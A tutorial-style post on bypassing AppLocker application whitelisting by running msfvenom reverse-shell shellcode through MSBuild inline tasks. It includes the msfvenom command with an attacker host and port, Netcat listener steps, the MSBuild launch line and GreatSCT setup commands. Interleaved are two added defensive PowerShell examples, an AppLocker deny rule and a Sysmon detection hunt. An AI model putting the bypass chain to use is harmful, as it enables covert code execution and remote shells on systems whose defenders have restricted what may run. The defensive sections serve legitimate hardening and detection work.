
This is how to bypass application whitelisting with MSBuild. In September 2016 Casey Smith posted a POC showing a malicious use of MSBuild.exe, a Microsoft-signed binary: it can be made to execute shellcode embedded in an .xml project file. MSBuild supports inline tasks, C# snippets that are compiled and run as part of the build and are meant to extend the build process.


MSBuild’s original purpose is to let developers build C# projects without Visual Studio. Microsoft has naturally gotten much better at security over time, so what do modern hostile actors focus on to carry out exploits these days? They increasingly rely on application whitelisting bypasses. That means “living off the land”, in other words using tools Microsoft already installs in order to execute malicious code.

What is AppLocker? AppLocker lets an administrator define, per user account or group, which applications are allowed to run. MSBuild and other legitimate Microsoft-signed binaries can be used to bypass this defense mechanism, because the signed binary itself is allowed while the code it compiles and runs is never inspected by the rule.

Here’s What You Need

Administer AppLocker using Group Policy

You must have Edit Setting permission to edit a GPO. By default, members of the Domain Admins group, the Enterprise Admins group, and the Group Policy Creator Owners group have this permission. Also, the Group Policy Management feature must be installed on the computer.

  1. Open the Group Policy Management Console (GPMC).
  2. Locate the GPO that contains the AppLocker policy to modify, right-click the GPO, and then click Edit.
  3. In the console tree, double-click Application Control Policies, double-click AppLocker, and then click the rule collection that you want to create the rule for.

Administer AppLocker on the local PC

  1. Click Start, type local security policy, and then click Local Security Policy.
  2. If the User Account Control dialog box appears, confirm that the action it displays is what you want, and then click Yes.
  3. In the console tree of the snap-in, double-click Application Control Policies, double-click AppLocker, and then click the rule collection that you want to create the rule for.
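The two procedures above set up rules through the GUI. The following is an added example, not part of the original post, showing the same thing done from PowerShell for the specific binary this tutorial abuses: an AppLocker path rule that denies MSBuild.exe, checked with Test-AppLockerPolicy before it is merged into the local policy. The rule Id is a made-up GUID, the SID S-1-1-0 (Everyone) is an assumption you would normally narrow to the group you want to block, the path wildcard is assumed to cover both the Framework and Framework64 trees, and MSBuild copies shipped with Visual Studio or Build Tools live elsewhere and would need their own rule.

```powershell
# Added example (not from the original post): deny MSBuild.exe via an AppLocker
# path rule, dry-run it, then merge it into the local AppLocker policy.
# Assumptions: made-up rule GUID; Everyone as the target SID; EnforcementMode
# left at AuditOnly so the rule can be validated before it actually blocks.

$policyXml = @"
<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="AuditOnly">
    <FilePathRule Id="11111111-2222-4333-8444-555555555555"
                  Name="Deny MSBuild.exe (inline task abuse)"
                  Description="Added example rule; validate in AuditOnly before enforcing"
                  UserOrGroupSid="S-1-1-0"
                  Action="Deny">
      <Conditions>
        <FilePathCondition Path="%WINDIR%\Microsoft.NET\*\MSBuild.exe" />
      </Conditions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>
"@

$policyPath = Join-Path $env:TEMP 'deny-msbuild.xml'
Set-Content -Path $policyPath -Value $policyXml -Encoding UTF8

# Dry run: ask AppLocker what this policy would decide for the exact binary
# the walkthrough invokes. The expected PolicyDecision is Denied.
Test-AppLockerPolicy -XmlPolicy $policyPath `
    -Path 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' `
    -User Everyone |
    Format-Table FilePath, PolicyDecision, MatchingRule -AutoSize

# Merge the rule into the local policy (run from an elevated shell).
# For a domain GPO, pass -Ldap with the GPO's distinguished name instead,
# matching the Group Policy procedure above.
Set-AppLockerPolicy -XmlPolicy $policyPath -Merge
```

Keep the collection in AuditOnly until the AppLocker event log shows that only the intended launches would have been blocked, then switch the Exe collection to Enabled; a Deny rule takes precedence over any Allow rule that would otherwise permit the signed binary.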

Method #1: Manual

  • Get the POC from https://gist.github.com/ConsciousHacker/5fce0343f29085cd9fba466974e43f17 and enter your shellcode into it.
  • Generate the shellcode.
  • Start a Netcat listener.

Generate the C# payload with msfvenom as an unstaged payload, which you will receive with a Netcat listener. The difference between unstaged and staged payloads? Staged payloads must be caught with msfconsole’s multi/handler, while unstaged payloads can be caught with plain Netcat.

msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=443 -f csharp

The POC .xml file has a conveniently labeled section, “replace with your C# code”, which is exactly what you do with the msfvenom output.


To execute the payload, call MSBuild to run a build of the .xml file crafted in the previous step.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe config.xml

The build starts.

The MSBuild binary loads the malicious .xml file.

On the Kali Linux side a Netcat listener receives the shell.

On the Kali side the Netcat listener receives a shell.
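From the defender's side, the telltale of Method #1 is MSBuild.exe being launched from a shell with a project file argument rather than by a development tool. The following is an added example, not code from the original post, that hunts the local Sysmon operational log for that pattern. It assumes Sysmon is installed and logging process creation (Event ID 1), and the regular expressions for a "build file" argument and a "shell-like" parent are assumptions to tune for your environment.

```powershell
# Added example (not from the original post): list MSBuild.exe launches from
# Sysmon Event ID 1 and flag those that look like the walkthrough above:
# a build file on the command line, started from a shell-like parent process.
# Assumption: Sysmon is installed with process-creation logging enabled.

function Find-SuspiciousMSBuild {
    param([int]$Hours = 24)

    $filter = @{
        LogName   = 'Microsoft-Windows-Sysmon/Operational'
        Id        = 1
        StartTime = (Get-Date).AddHours(-$Hours)
    }

    Get-WinEvent -FilterHashtable $filter -ErrorAction Stop | ForEach-Object {
        # Pull the EventData fields by name so the code does not depend on
        # the field order of a particular Sysmon version.
        $x = [xml]$_.ToXml()
        $d = @{}
        foreach ($item in $x.Event.EventData.Data) { $d[$item.Name] = $item.'#text' }

        if ($d.Image -match '\\MSBuild\.exe$') {
            # A project file passed directly, from a shell parent, is the
            # pattern in the post; IDE-driven builds normally have an IDE
            # or build-server parent. Both regexes are assumptions.
            $projectArg  = $d.CommandLine -match '\.(xml|csproj|proj)\b'
            $shellParent = $d.ParentImage -match '\\(cmd|powershell|pwsh|wscript|cscript|explorer)\.exe$'

            [pscustomobject]@{
                Time        = $_.TimeCreated
                User        = $d.User
                CommandLine = $d.CommandLine
                Parent      = $d.ParentImage
                Suspicious  = ($projectArg -and $shellParent)
            }
        }
    }
}

# Usage: show only the flagged launches from the last three days.
Find-SuspiciousMSBuild -Hours 72 | Where-Object Suspicious | Format-Table -AutoSize
```

A hit here pairs naturally with the AppLocker audit events from the rule configured earlier: the Sysmon record gives you the command line and parent, and the AppLocker log tells you whether the policy would have stopped it.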

Method #2: Using Automated Tools

Using GreatSCT

git clone https://github.com/GreatSCT/GreatSCT.git
cd GreatSCT
cd setup
sudo ./setup.sh -c
python3 GreatSCT.py

That’s it for the How to Bypass Application Whitelisting with MSBuild tutorial. If you have questions or comments, feel free to leave them at the end of the page!
